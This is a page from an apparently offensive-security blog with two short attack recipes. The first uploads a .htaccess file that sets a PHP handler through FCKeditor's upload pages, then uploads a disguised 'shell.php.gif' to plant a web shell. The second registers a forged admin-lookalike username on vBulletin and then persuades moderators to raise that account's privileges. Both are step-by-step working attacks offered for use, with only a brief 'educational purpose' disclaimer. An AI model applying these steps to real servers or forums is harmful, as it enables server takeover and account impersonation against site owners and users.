lo0.ro cat /dev/null > stupidity – nobody is safe

8Aug/114

Bypass all versions FCKeditor with htaccess and gain shell

Bypass all versions FCKeditor with htaccess

1.create a htaccess file (.htaccess):

[cc lang="php"]
SetHandler application/x-httpd-php
[/cc]
2.Now upload this htaccess with FCKeditor.
[cc lang="html"]http://target.com/FCKeditor/editor/filemanager/upload/test.html

http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/t

est.html[/cc]

3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gif, the name "shell.php.gif" change to
"shell_php.gif" automatically.
5.http://target.com/anything/shell_php.gif
6.Now shell is available from server.

Credit : pentest lab
Source

Pentesting on other systems then the ones you own is illegal and this post is only for educational purpose.

6Jun/110

vBulletin – Registration Bypass Vulnerability

1. Check the names of the admins/moderators on the forums

2. Go to Http://[localhost]/path/register.php

3. [cc lang="html"]Type this at User Name ===> ADMIN_username�[/cc]

4. [cc lang="html"]� is an ASCII Code[/cc]

5. complete the other parameters

6. Then click on Complete Registration

7. Now you see that your user name like admin user name

8. PM the moderators to elevate your account or promote another user. (or other nutty things)

(this is old but its still working)
Author: Immortal Boy
Iranian Datacoders Security Team